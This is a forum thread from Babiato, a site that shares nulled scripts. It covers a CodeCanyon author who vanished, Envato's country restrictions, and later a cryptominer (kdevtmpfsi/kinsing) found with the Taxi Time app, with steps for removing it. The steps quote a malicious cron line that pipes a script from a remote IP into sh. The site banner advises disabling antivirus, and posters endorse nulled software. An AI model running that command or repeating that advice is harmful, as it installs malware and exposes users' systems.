• You MUST read the Babiato Rules before making your first post otherwise you may get permanent warning points or a permanent Ban.

Our resources on Babiato Forum are CLEAN and SAFE. So you can use them for development and testing purposes. If your are on Windows and have an antivirus that alerts you about a possible infection: Know it's a false positive because all scripts are double checked by our experts. We advise you to add Babiato to trusted sites/sources or disable your antivirus momentarily while downloading a resource. "Enjoy your presence on Babiato"

Troubled authors ...

tsvendas

Trusted Uploader
Dec 16, 2019
Have you ever been in a situation where a Codecanyon author promised an update for several days and on the day the update would be released, the item disappeared from the planet (according to the CC itself)?

1586360589915.png

The author of this item: https://codecanyon.net/item/taxi-time-android-taxi-application-complete-solution/25794533 promised for several days that he would send a new updated and corrected version to the CC, but as new features would be added, he said the price would change from $ 99 to $ 199. So interested parties should purchase a $ 99 license before the new update is released. The infamous author even added an image with a kind of timeline until the release date of the new update. 😂

To my surprise, when the release date of the new, more expensive and updated version arrived, the author disappeared with the item and now he does not answer the questions via Skype.

What do you think:
Did the author deceive everyone?
Was the author abducted by aliens?
Did the CC block the author?
Should I publish the author's item file here on Babiato?

The app and the panel work well (it could be better), so I didn't understand why the author acted that way.

Reactions: elmocando
It happend to me twice. For one item the author went on to support and sell it privately, the other went dead. Envato will not help you. They basically told me to cry it out. It could be various reasons, why he's gone. Personally I have stopped purchasing items on envato for this same reason. So yeah fu** envato and appreciate everything on this forum.

Reactions: Babak
some user in this forum share hes themeforest account over 30 purchased item :d
i login in themeforest account :| over 20 file deleted :)) and some items updated back to 2016-2014 :D

• Wow
Reactions: Medw1311
i login in themeforest account :| over 20 file deleted :)) and some items updated back to 2016-2014 :D
I saw an account with over a hundred items and approximately 30% of the items removed. But the guy convinced several people that they should buy a license before the update was released and the price increased. The guy disappeared before that and can't Envato do anything about it?

That's the case of almost envato element code or WP stuff.
Envato Element is only usefull for AE, music & graphics.
Moreover a lot of developpers start to sell on CodeCanyon or ThemeForest but when they have enough customers they remove their product due to the "lifetime" update rule.
That's why now I have no regret to use some nulled stuff. o_O

I saw an account with over a hundred items and approximately 30% of the items removed. But the guy convinced several people that they should buy a license before the update was released and the price increased. The guy disappeared before that and can't Envato do anything about it?
That's the case of almost envato element code or WP stuff.
Envato Element is only usefull for AE, music & graphics.
Moreover a lot of developpers start to sell on CodeCanyon or ThemeForest but when they have enough customers they remove their product due to the "lifetime" update rule.
That's why now I have no regret to use some nulled stuff. o_O
but i always support dev if i like a theme or plugin
4 days ago i purchase license for this theme :D

Reactions: tsvendas
ALSO Publisher theme removed from themeforest too
becuz envato not working with iranian! :(

i cant remember when but 3 4 years ago envato block all iranian buyer or dev account
so i lose 500$ purchased item :(

Restricted Countries List
  • Iran :(
  • Cuba
  • Syria
  • Crimea Region
  • North Korea
This list is not exhaustive and Envato reserves the right to restrict access to all Envato platforms from other countries and regions at any time

Restricted Countries List
  • Iran :(
  • Cuba
  • Syria
  • Crimea Region
  • North Korea
This list is not exhaustive and Envato reserves the right to restrict access to all Envato platforms from other countries and regions at any time
I was unaware that there were restrictions for these countries and that others could also be included in this list. Some of these countries are obvious, but do they have public reasons for applying these restrictions to others?

I was unaware that there were restrictions for these countries and that others could also be included in this list. Some of these countries are obvious, but do they have public reasons for applying these restrictions to others?
becuz of usa :D
This happen when envato move his company from Australia to USA!
About usa read here

The author of the item I mentioned is really problematic

1586436154055.png

I realized that when adding the Taxi Time code to the server, the cpu went up to almost 100% because of this little miner kdevtmpfsi. I have no experience in detecting malicious files, so I did a test on another server to make sure that the problem was generated by taxi time, the result is the same. I found out that this is a miner because after a quick survey, I saw that there are several similar cases. If you are going to install this item, remove that miner.

Step 1: Find the process ids of kdevtmpfsi and kinsing, and kill them both using

kill -9 [PID]

Step 2: Delete two files using (located at /var/tmp/ and /tmp/)

rm -rf kdevtmpfsi & rm -rf kinsing

Remember to delete the files of this daemon, if you can't find it, you can also use this command to find them
find / -name kdevtmpfsi
find / -name kinsing

Last Step: Check /var/spool/cron/crontabs/ to see if any related Trojan timed tasks are being executed (www-data). If yes, delete them and restart crontab. probably it looks like this * * * * * wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1

Reactions: Babak and o..
I don't think there is any good, bug free code on codecanyon. Everything I've tested is problematic.

Reactions: ruv and cduke
AdBlock Detected

We get it, advertisements are annoying!

However in order to keep our huge array of resources free of charge we need to generate income from ads so to use the site you will need to turn off your adblocker.

If you'd like to have an ad free experience you can become a Babiato Lover by donating as little as $5 per month. Click on the Donate menu tab for more info.

I've Disabled AdBlock